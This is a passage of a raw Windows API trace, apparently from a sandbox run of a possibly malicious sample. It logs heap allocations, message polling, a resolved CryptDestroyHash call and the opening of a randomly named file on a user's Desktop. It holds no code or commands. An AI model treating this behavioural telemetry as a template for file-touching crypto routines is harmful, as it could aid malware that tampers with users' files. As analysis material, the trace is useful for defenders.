hHeap=0x2af0000) returned 1 [0087.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0087.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.498] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.498] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.498] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.498] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.498] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.499] CryptDestroyHash (hHash=0x9a3fc0) returned 1 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0087.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0087.503] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.503] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.503] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.503] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0087.504] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/6yMUE.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\6ymue.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0087.504] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.504] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0087.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 